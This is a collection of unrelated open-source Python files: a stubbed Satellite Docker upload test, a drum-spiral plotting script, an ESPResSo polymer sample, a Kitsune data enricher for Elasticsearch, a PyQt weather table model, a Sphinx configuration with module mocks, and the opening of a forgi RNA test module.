        result = docker_host.execute(docker_pull_command)
        assert result.status == 0

    @pytest.mark.stubbed
    @pytest.mark.skip_if_not_set('docker')
    @pytest.mark.tier3
    @pytest.mark.upgrade
    def test_positive_upload_image(self, module_org):
        """A Docker-enabled client can create a new ``Dockerfile``
        pointing to an existing Docker image from a Satellite 6 and modify it.
        Then, using ``docker build`` generate a new image which can then be
        uploaded back onto the Satellite 6 as a new repository.

        :id: 2c47559c-b27f-436e-9b1e-df5c3633b007

        :Steps:

            1. Create a local docker compute resource
            2. Create a container and start it
            3. [on docker host] Commit a new image from the container
            4. [on docker host] Export the image to tar
            5. scp the image to satellite box
            6. create a new docker repo
            7. upload the image to the new repo

        :expectedresults: Client can create a new image based off an existing
            Docker image from a Satellite 6 instance, add a new package and
            upload the modified image (plus layer) back to the Satellite 6.
        """
        # NOTE(review): this stubbed test references ``docker_host`` below,
        # but ``docker_host`` is not a parameter of this method - it would
        # raise NameError if unstubbed; confirm the intended fixture before
        # enabling.
        try:
            """
            These functions were removed, but let's leave them here
            to maintain overall test logic - in case required functionality
            is eventually implemented

            compute_resource = make_compute_resource({
                'organization-ids': [module_org.id],
                'provider': 'Docker',
                'url': f'http://{docker_host.ip_addr}:2375',
            })
            container = make_container({
                'compute-resource-id': compute_resource['id'],
                'organization-ids': [module_org.id],
            })
            Docker.container.start({'id': container['id']})
            """
            container = {'uuid': 'stubbed test'}
            repo_name = gen_string('alphanumeric').lower()
            # Commit a new docker image and verify image was created
            image_name = f'{repo_name}/{CONTAINER_UPSTREAM_NAME}'
            result = docker_host.execute(
                f'docker commit {container["uuid"]} {image_name}:latest && '
                f'docker images --all | grep {image_name}'
            )
            assert result.status == 0
            # Save the image to a tar archive
            result = docker_host.execute(f'docker save -o {repo_name}.tar {image_name}')
            assert result.status == 0
            tar_file = f'{repo_name}.tar'
            ssh.download_file(tar_file, hostname=docker_host.ip_addr)
            ssh.upload_file(
                local_file=tar_file,
                remote_file=f'/tmp/{tar_file}',
                hostname=settings.server.hostname,
            )
            # Upload tarred repository
            product = make_product_wait({'organization-id': module_org.id})
            repo = _repo(product['id'])
            Repository.upload_content({'id': repo['id'], 'path': f'/tmp/{repo_name}.tar'})
            # Verify repository was uploaded successfully
            repo = Repository.info({'id': repo['id']})
            # NOTE(review): asserting equality and then substring membership
            # on the same field looks contradictory - presumably the first
            # assert should use ``in`` rather than ``==``; verify before
            # unstubbing.
            assert settings.server.hostname == repo['published-at']
            repo_name = '-'.join((module_org.label, product['label'], repo['label'])).lower()
            assert repo_name in repo['published-at']
        finally:
            # Remove the archive
            ssh.command(f'rm -f /tmp/{repo_name}.tar')
|
exmachina-dev/WDY-firmware
|
tools/graph_spiral.py
|
"""
ldr.py
Display analog data from Arduino using Python (matplotlib)
Author: Mahesh Venkitachalam
Website: electronut.in
"""
import argparse
import numpy as np
import math
import matplotlib.pyplot as plt
import matplotlib.animation as animation
# Strap / drum geometry constants (values mirror the firmware; units are
# presumably millimetres -- TODO confirm against the firmware headers).
_S_THK = 1.1                 # strap thickness
_D_DIA = 120                 # bare drum diameter
WDY_MAX_POSITION = 30000     # full strap travel
WDY_STRAP_DEAD_OFFSET = 0    # strap length that is never unwound
WDY_DRUM_OFFSET_TURNS = 0    # extra turns always left on the drum
_PI = 3.1415                 # low-precision pi, kept identical to the firmware


def spiral_length_to_turns(length):
    """Return the number of turns still wound on the drum for a paid-out
    strap *length*, by solving the Archimedean-spiral length equation."""
    wound_length = WDY_MAX_POSITION - length + WDY_STRAP_DEAD_OFFSET
    discriminant = pow(_D_DIA - _S_THK, 2) + (4 * _S_THK * wound_length) / _PI
    return (_S_THK - _D_DIA + math.sqrt(discriminant)) / (2 * _S_THK)


def spiral_length_to_diameter(length):
    """Return the effective (wound) drum diameter for a paid-out strap
    *length*: two strap thicknesses per remaining turn on top of the bare
    drum diameter."""
    total_turns = spiral_length_to_turns(length) + WDY_DRUM_OFFSET_TURNS
    return 2 * total_turns * _S_THK + _D_DIA
# main() function
def main():
    """Plot drum turn count and drum diameter as functions of strap length.

    Command line:
        --max/-M   upper strap-length bound (default 30000)
        --min/-m   lower strap-length bound (default 0)
        --step/-s  sampling step (default 1)
    """
    # create parser
    parser = argparse.ArgumentParser(
        description="Graph spiral turns and diameter vs. strap length")
    parser.add_argument('--max', '-M', type=int, default=30000)
    parser.add_argument('--min', '-m', type=int, default=0)
    parser.add_argument('--step', '-s', type=int, default=1)
    # parse args
    args = parser.parse_args()

    # Sample both curves over the requested length range.
    lengths = list(range(args.min, args.max, args.step))
    if not lengths:
        # Previously an empty range crashed with IndexError below.
        parser.error("empty length range: --min must be smaller than --max")
    turns = [spiral_length_to_turns(x) for x in lengths]
    diameters = [spiral_length_to_diameter(x) for x in lengths]

    print('Plotting data...')
    # BUG FIX: the curves used to be plotted against the sample *index*,
    # which disagrees with the x-axis limits whenever --min != 0 or
    # --step != 1.  Plot against the actual length values instead.
    ax = plt.axes(xlim=(args.min, args.max), ylim=(0, diameters[0] + 10))
    ax.plot(lengths, turns, label='Length to turns')
    ax.plot(lengths, diameters, label='Length to diameter')
    # show plot
    ax.legend()
    plt.show()
    print('Exiting.')


# call main only when executed as a script
if __name__ == '__main__':
    main()
|
FabriceSalvaire/PyValentina
|
Patro/__init__.py
|
####################################################################################################
#
# Patro - A Python library to make patterns for fashion design
# Copyright (C) 2017 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
####################################################################################################
# cf. PEP 396 -- Module Version Numbers https://www.python.org/dev/peps/pep-0396/
# Public release version of the Patro package; bump on every release
# (presumably kept in sync with the packaging metadata -- TODO confirm).
__version__ = '0.3.0'
|
tbereau/espresso
|
samples/python/minimal-polymer.py
|
#
# Copyright (C) 2013,2014,2015,2016 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import espressomd
from espressomd import thermostat
from espressomd import integrate
from espressomd import interactions
import numpy

# System parameters
#############################################################
system = espressomd.System()
# if no seed is provided espresso generates a seed
system.time_step = 0.01
system.skin = 0.4
system.box_l = [100, 100, 100]
system.thermostat.set_langevin(1.0, 1.0)
system.cell_system.set_n_square(use_verlet_lists=False)

# Lennard-Jones between all beads, cut off at the potential minimum
# (2^(1/6) sigma) with an automatic shift, i.e. purely repulsive.
system.non_bonded_inter[0, 0].lennard_jones.set_params(
    epsilon=1, sigma=1,
    cutoff=2**(1. / 6), shift="auto")

# FENE bond connecting consecutive beads of the polymer (bond id 0).
fene = interactions.FeneBond(k=10, d_r_max=2)
system.bonded_inter.add(fene)

# Create a single polymer chain of 50 monomers.
poly = system.polymer
poly(N_P=1, bond_length=1.0, MPC=50, bond_id=0)

#############################################################
#      Integration                                          #
#############################################################
for i in range(20):
    integrate.integrate(1000)
    energies = system.analysis.energy()
    # BUG FIX: this was the Python-2-only statement `print energies`,
    # which is a SyntaxError under Python 3; the call form works on both.
    print(energies)
|
sanacl/GrimoireELK
|
grimoire/elk/kitsune.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#
#
# Copyright (C) Bitergia
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Authors:
# Alvaro del Castillo San Felix <acs@bitergia.com>
#
import json
import logging
from dateutil import parser
from grimoire.elk.enrich import Enrich, metadata
from .utils import get_time_diff_days
class KitsuneEnrich(Enrich):
    """Enrich raw Kitsune (Mozilla support forum) items for Elasticsearch.

    Each raw question is flattened into an enriched document; its answers
    are enriched as separate documents of type 'answer'.
    """

    def get_field_author(self):
        # Field in the raw item that holds the author identity.
        return "creator"

    def get_elastic_mappings(self):
        """Return the ES mapping: the free-text fields get analyzed copies."""
        mapping = """
        {
            "properties": {
                "content_analyzed": {
                    "type": "string",
                    "index": "analyzed"
                },
                "tags_analyzed": {
                    "type": "string",
                    "index": "analyzed"
                }
            }
        } """
        return {"items": mapping}

    def get_sh_identity(self, item, identity_field=None):
        """Build a SortingHat identity dict from a raw item or user dict.

        ``item`` may be a full raw item (the user is then taken from
        ``item['data'][identity_field]``), a dict that contains
        ``identity_field`` (answers), or already a user dict.
        """
        identity = {}
        user = item
        if 'data' in item and type(item) == dict:
            user = item['data'][identity_field]
        elif identity_field in item:
            # for answers
            user = item[identity_field]
        identity['username'] = user['username']
        # Email is never present in the raw Kitsune data.
        identity['email'] = None
        identity['name'] = user['username']
        if user['display_name']:
            # Prefer the human-readable display name when set.
            identity['name'] = user['display_name']
        return identity

    def get_identities(self, item):
        """ Return the identities from an item """
        identities = []
        item = item['data']
        for identity in ['creator']:
            # Todo: questions has also involved and solved_by
            if identity in item and item[identity]:
                user = self.get_sh_identity(item[identity])
                identities.append(user)
            # Also collect the identity from every answer of the question.
            if 'answers_data' in item:
                for answer in item['answers_data']:
                    user = self.get_sh_identity(answer[identity])
                    identities.append(user)
        return identities

    @metadata
    def get_rich_item(self, item, kind='question'):
        """Flatten a raw item into an enriched ES document.

        :param item: for kind='question' the full raw item; for
            kind='answer' a single answer dict from ``answers_data``.
        :param kind: 'question' or 'answer'
        :returns: dict ready to be indexed in Elasticsearch
        """
        eitem = {}
        # Fields common in questions and answers
        common_fields = ["product", "topic", "locale", "is_spam", "title"]
        if kind == 'question':
            eitem['type'] = kind
            # metadata fields to copy
            copy_fields = ["metadata__updated_on", "metadata__timestamp",
                           "ocean-unique-id", "origin", "offset"]
            for f in copy_fields:
                if f in item:
                    eitem[f] = item[f]
                else:
                    eitem[f] = None
            # The real data
            question = item['data']
            # data fields to copy
            copy_fields = ["content", "num_answers", "solution"]
            copy_fields += common_fields
            for f in copy_fields:
                if f in question:
                    eitem[f] = question[f]
                else:
                    eitem[f] = None
            eitem["content_analyzed"] = question['content']
            # Fields which names are translated
            map_fields = {
                "id": "question_id",
                "num_votes": "score"
            }
            for fn in map_fields:
                eitem[map_fields[fn]] = question[fn]
            # Tags are flattened into one comma-separated string of slugs.
            tags = ''
            for tag in question['tags']:
                tags += tag['slug'] + ","
            tags = tags[0:-1]  # remove last ,
            eitem["tags"] = tags
            eitem["tags_analyzed"] = tags
            # Enrich dates
            eitem["creation_date"] = parser.parse(question["created"]).isoformat()
            eitem["last_activity_date"] = parser.parse(question["updated"]).isoformat()
            eitem['lifetime_days'] = \
                get_time_diff_days(question['created'], question['updated'])
            eitem.update(self.get_grimoire_fields(question['created'], "question"))
            # Author: display name preferred over username when present.
            eitem['author'] = question['creator']['username']
            if question['creator']['display_name']:
                eitem['author'] = question['creator']['display_name']
            if self.sortinghat:
                eitem.update(self.get_item_sh(item))
        elif kind == 'answer':
            # Answers arrive as bare dicts, not full perceval items.
            answer = item
            eitem['type'] = kind
            # data fields to copy
            copy_fields = ["content", "solution"]
            copy_fields += common_fields
            for f in copy_fields:
                if f in answer:
                    eitem[f] = answer[f]
                else:
                    eitem[f] = None
            eitem["content_analyzed"] = answer['content']
            # Fields which names are translated
            map_fields = {
                "id": "answer_id",
                "question": "question_id",
                "num_helpful_votes": "score",
                "num_unhelpful_votes": "unhelpful_answer"
            }
            for fn in map_fields:
                eitem[map_fields[fn]] = answer[fn]
            eitem["helpful_answer"] = answer['num_helpful_votes']
            # Enrich dates
            eitem["creation_date"] = parser.parse(answer["created"]).isoformat()
            eitem["last_activity_date"] = parser.parse(answer["updated"]).isoformat()
            eitem['lifetime_days'] = \
                get_time_diff_days(answer['created'], answer['updated'])
            eitem.update(self.get_grimoire_fields(answer['created'], "answer"))
            # Author: display name preferred over username when present.
            eitem['author'] = answer['creator']['username']
            if answer['creator']['display_name']:
                eitem['author'] = answer['creator']['display_name']
            if self.sortinghat:
                # date field must be the same than in question to share code
                answer[self.get_field_date()] = answer['updated']
                eitem[self.get_field_date()] = answer[self.get_field_date()]
                eitem.update(self.get_item_sh(answer))
        return eitem

    def enrich_items(self, items):
        """Bulk-index the enriched questions and their answers.

        Documents are sent to Elasticsearch in packs of at most
        ``max_items_bulk``; returns the total number of documents sent.
        """
        max_items = self.elastic.max_items_bulk
        current = 0
        bulk_json = ""
        total = 0
        url = self.elastic.index_url + '/items/_bulk'
        logging.debug("Adding items to %s (in %i packs)", url, max_items)
        for item in items:
            if current >= max_items:
                # Flush the accumulated bulk payload once a pack is full.
                self.requests.put(url, data=bulk_json)
                bulk_json = ""
                current = 0
            rich_item = self.get_rich_item(item)
            data_json = json.dumps(rich_item)
            bulk_json += '{"index" : {"_id" : "%s" } }\n' % \
                (item[self.get_field_unique_id()])
            bulk_json += data_json + "\n"  # Bulk document
            current += 1
            total += 1
            # Time to enrich also the answers
            if 'answers_data' in item['data']:
                for answer in item['data']['answers_data']:
                    # Add question title in answers
                    answer['title'] = item['data']['title']
                    # Mark whether this answer is the accepted solution.
                    answer['solution'] = 0
                    if answer['id'] == item['data']['solution']:
                        answer['solution'] = 1
                    rich_answer = self.get_rich_item(answer, kind='answer')
                    data_json = json.dumps(rich_answer)
                    # Answer ids are namespaced under their question's id.
                    bulk_json += '{"index" : {"_id" : "%s_%i" } }\n' % \
                        (item[self.get_field_unique_id()],
                         rich_answer['answer_id'])
                    bulk_json += data_json + "\n"  # Bulk document
                    current += 1
                    total += 1
        # Send the remaining (partial) pack.
        self.requests.put(url, data=bulk_json)
        return total
|
Pesa/forse
|
src/forse/weather_station/WeatherModel.py
|
###########################################################################
#
# Copyright (c) 2010 Davide Pesavento <davidepesa@gmail.com>
#
# This file is part of FORSE.
#
# FORSE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# FORSE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with FORSE. If not, see <http://www.gnu.org/licenses/>.
#
###########################################################################
from PyQt4.Qt import Qt
from PyQt4.QtCore import QAbstractTableModel, QVariant
from PyQt4.QtGui import QIcon
from OTPApplication import OTPApplication
class WeatherModel(QAbstractTableModel):
    """Qt table model of per-sector rain intensity plus pending local edits.

    Column 0: sector id; column 1: current value (with an icon);
    column 2: locally edited value not yet committed.
    """

    def __init__(self):
        QAbstractTableModel.__init__(self)
        # sector id -> locally edited rain value (pending, not yet applied)
        self.__changes = {}
        # sector id -> current rain value as last received
        self.__weather = {}
        self.__sun = QIcon(":/icons/sun.png")
        self.__lightRain = QIcon(":/icons/light-rain.png")
        self.__rain = QIcon(":/icons/rain.png")
        self.__heavyRain = QIcon(":/icons/heavy-rain.png")
        # Icon lookup indexed by rain intensity 0..10:
        #   0 -> sun, 1-3 -> light rain, 4-7 -> rain, 8-10 -> heavy rain
        self.__icons = [self.__sun]
        self.__icons[1:3] = [self.__lightRain] * 3
        self.__icons[4:7] = [self.__rain] * 4
        self.__icons[8:10] = [self.__heavyRain] * 3
        # Both the initial snapshot and incremental updates reuse _setWeather.
        handlers = {('init', 'weather'): self._setWeather,
                    ('update', 'weather'): self._setWeather}
        OTPApplication.registerMsgHandlers(handlers)

    def changes(self):
        # Pending (sector id, value) edits.
        return self.__changes.items()

    def discardChanges(self):
        """Drop all pending local edits and refresh attached views."""
        self.__changes = {}
        self.reset()

    def columnCount(self, _parent):
        return 3

    def rowCount(self, _parent):
        return len(self.__weather)

    def flags(self, index):
        flags = QAbstractTableModel.flags(self, index)
        if index.column() == 2:
            # Only the "local changes" column is user-editable.
            flags |= Qt.ItemIsEditable
        return flags

    def data(self, index, role):
        """Return cell data per role (standard Qt model API)."""
        if role == Qt.DisplayRole:
            try:
                if index.column() == 0:
                    return QVariant(index.row())
                elif index.column() == 1:
                    return QVariant(self.__weather[index.row()])
                elif index.column() == 2:
                    return QVariant(self.__changes[index.row()])
            except KeyError:
                # No value for this cell (e.g. no pending edit): blank.
                pass
        elif role == Qt.DecorationRole and index.column() == 1:
            return QVariant(self.__icons[self.__weather[index.row()]])
        elif role == Qt.EditRole and index.column() == 2:
            try:
                return QVariant(self.__changes[index.row()])
            except KeyError:
                # No pending edit yet: start editing from the current value.
                return QVariant(self.__weather[index.row()])
        elif role == Qt.TextAlignmentRole:
            return QVariant(Qt.AlignCenter)
        return QVariant()

    def headerData(self, section, orientation, role):
        if orientation == Qt.Horizontal and role == Qt.DisplayRole:
            if section == 0:
                return QVariant("Sector")
            elif section == 1:
                return QVariant("Current")
            elif section == 2:
                return QVariant("Local changes")
        return QVariant()

    def setData(self, index, value, role):
        """Record a local edit; editing back to the current value clears it."""
        changed = False
        if index.column() == 2 and role == Qt.EditRole:
            r = index.row()
            if value != self.__weather[r]:
                self.__changes[r] = value
                changed = True
            elif r in self.__changes:
                # Edited back to the current value: the pending change is moot.
                del self.__changes[r]
                changed = True
        if changed:
            self.dataChanged.emit(index, index)
        return changed

    def _setWeather(self, weather):
        """Apply a weather message: an iterable of (sector id, rain) pairs."""
        for sectId, rain in weather:
            self.__weather[sectId] = rain
            try:
                if self.__changes[sectId] == rain:
                    # The update matches the pending edit: drop the edit.
                    del self.__changes[sectId]
            except KeyError:
                pass
        self.reset()
|
MattNolanLab/ei-attractor
|
doc/conf.py
|
# -*- coding: utf-8 -*-
#
# Grid cell modeling and data analysis documentation build configuration file, created by
# sphinx-quickstart on Thu Oct 31 21:47:10 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# Detect a build running on the Read The Docs service; RTD needs a different
# theme setup (see the HTML output options below).
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if on_rtd:
    print('Inside RTD environment!')
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('../simtools'))
sys.path.insert(0, os.path.abspath('../noisefigs'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.pngmath',
'sphinx.ext.mathjax',
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.todo',
'sphinx.ext.inheritance_diagram',
'numpydoc'
]
# Include todos?
todo_include_todos = True
#
# Fix an issue with nonexistent documents:
# https://github.com/phn/pytpm/issues/3#issuecomment-12133978
numpydoc_show_class_members = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ei-attractor'
copyright = u'2010-2015, Lukas Solanka'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'data_descriptions/*']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
if on_rtd:
    # On Read The Docs the built-in default theme is combined with the RTD
    # CSS plus our local overrides.
    html_theme = 'default'
    html_context = {
        'css_files': [
            'https://media.readthedocs.org/css/sphinx_rtd_theme.css',
            'https://media.readthedocs.org/css/readthedocs-doc-embed.css',
            '_static/theme_overrides.css',
        ],
    }
else:
    # Local builds use the sphinx_rtd_theme package directly.
    import sphinx_rtd_theme
    html_theme = 'sphinx_rtd_theme'
    html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]

    def setup(app):
        # Sphinx hook: inject the CSS overrides into every generated page.
        app.add_stylesheet('theme_overrides.css')
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Gridcellmodelinganddataanalysisdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Gridcellmodelinganddataanalysis.tex', u'Grid cell modeling and data analysis Documentation',
u'Lukas Solanka', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'gridcellmodelinganddataanalysis', u'Grid cell modeling and data analysis Documentation',
[u'Lukas Solanka'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Gridcellmodelinganddataanalysis', u'Grid cell modeling and data analysis Documentation',
u'Lukas Solanka', 'Gridcellmodelinganddataanalysis', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# inheritance
inheritance_graph_attrs = dict(rankdir="TB", fontsize=14, ratio='compress')
graphviz_output_format = 'svg'
##############################################################################
class Mock(object):
    """Stand-in for modules that cannot be imported on the docs builder.

    Calling a Mock yields another Mock.  Attribute access returns
    '/dev/null' for module metadata, a freshly fabricated class for
    capitalized names (so the attribute can be used as a base class by
    autodoc-imported code), and a new Mock otherwise.
    """

    __all__ = []

    def __init__(self, *args, **kwargs):
        pass

    def __call__(self, *args, **kwargs):
        return Mock()

    @classmethod
    def __getattr__(cls, name):
        if name in ('__file__', '__path__'):
            # Sphinx inspects module metadata on the mocked modules.
            return '/dev/null'
        first = name[0]
        if first != first.upper():
            return Mock()
        # Capitalized names are assumed to be classes: fabricate one so it
        # can serve as a base class during documentation import.
        fake_class = type(name, (), {})
        fake_class.__module__ = __name__
        return fake_class
class NestMock(Mock):
    """Mock specialised for the `nest` simulator module.

    Behaves like Mock except that lowercase attribute access returns
    NestMock instances and nest.Install(...) is a harmless no-op.
    """

    def __init__(self, *args, **kwargs):
        pass

    @classmethod
    def __getattr__(cls, name):
        if name in ('__file__', '__path__'):
            return '/dev/null'
        first_char = name[0]
        if first_char == first_char.upper():
            # Fabricate a class for capitalized attribute names.
            generated = type(name, (), {})
            generated.__module__ = __name__
            return generated
        return NestMock()

    def Install(self, *args, **kwargs):
        # nest's extension-loading entry point; deliberately does nothing.
        pass
# Modules unavailable on the Read The Docs build machines.  Each is replaced
# in sys.modules with a Mock before autodoc imports project code that
# depends on it.
MOCK_MODULES = [
    'numpy', 'numpy.ma', 'numpy.ma.core', 'numpy.fft', 'numpy.fft.fftpack',
    'numpy.random', 'numpy.core', 'numpy.core.umath',
    'scipy', 'scipy.integrate', 'scipy.signal', 'scipy.ndimage', 'scipy.stats',
    'scipy.ndimage.interpolation', 'scipy.optimize', 'scipy.interpolate',
    'scipy.io',
    'matplotlib', 'matplotlib.axes', 'matplotlib.pyplot', 'matplotlib.patches',
    'matplotlib.ticker', 'matplotlib.colors', 'matplotlib.transforms',
    'matplotlib.colorbar', 'matplotlib.gridspec', 'matplotlib.backends',
    'matplotlib.backends.backend_pdf',
    'grid_cell_model.analysis.Wavelets',
    'gridcells', 'gridcells.analysis', 'gridcells.analysis.signal',
    'pyentropy', 'minepy',
    'configobj',
]
for mod_name in MOCK_MODULES:
    sys.modules[mod_name] = Mock()
# `nest` gets the specialised mock that also provides a no-op Install().
sys.modules['nest'] = NestMock()
|
ViennaRNA/forgi
|
test/forgi/threedee/model/coarse_grain_test.py
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from builtins import range
import warnings
import unittest
import sys
import itertools as it
import copy
import time
import math
import logging
import os.path
import os
import shutil
import contextlib
try:
from unittest.mock import patch
except ImportError:
from mock import patch
import numpy as np
import numpy.testing as nptest
import forgi.threedee.model.coarse_grain as ftmc
import forgi.graph.bulge_graph as fgb
import forgi.threedee.model.similarity as ftme
import forgi.threedee.utilities.graph_pdb as ftug
import forgi.threedee.utilities.vector as ftuv
import forgi.utilities.debug as fud
from forgi.utilities.stuff import make_temp_directory
from ...graph import bulge_graph_test as tfgb
log = logging.getLogger(__name__)
@contextlib.contextmanager
def ignore_warnings():
    """Context manager that silences every warning raised in its block."""
    with warnings.catch_warnings():
        # Install a blanket "ignore" filter for the duration of the block;
        # catch_warnings restores the previous filters on exit.
        warnings.simplefilter("ignore")
        yield None
def cg_from_sg(cg, sg):
    '''
    Create a coarse-grain structure from a subgraph.

    @param cg: The original structure
    @param sg: The list of elements that are in the subgraph
    @return: A new coarse-grain structure restricted to the subgraph.
    '''
    # Delegate to the library implementation.  The manual element-copying
    # code that used to follow this return was unreachable dead code and
    # has been removed.
    return ftmc.cg_from_sg(cg, sg)
def mock_run_mc_annotate(original_function):
    """
    Caching of MC-Annotate output for speedup.

    Wraps ``original_function`` (the real _run_mc_annotate) so that its
    output is stored next to the test data and reused on later runs.
    """
    def mocked_run_mc_annotate(filename, subprocess_kwargs):
        # Cache file is named after the input PDB, stored with the test data.
        new_fn = os.path.split(filename)[1]
        new_fn += ".mcAnnotate.out"
        try:
            with open(os.path.join("test", "forgi", "threedee", "data", new_fn)) as f:
                lines = f.readlines()
            # error level so the cache hit is visible in the test output
            log.error("Using cached MC-Annotate output")
        except IOError:  # on py3 this is an alias of oserror
            # Cache miss: run the real tool and store its output for reuse.
            lines = original_function(filename, subprocess_kwargs)
            with open(os.path.join("test", "forgi", "threedee", "data", new_fn), "w") as f:
                print("\n".join(lines), file=f)
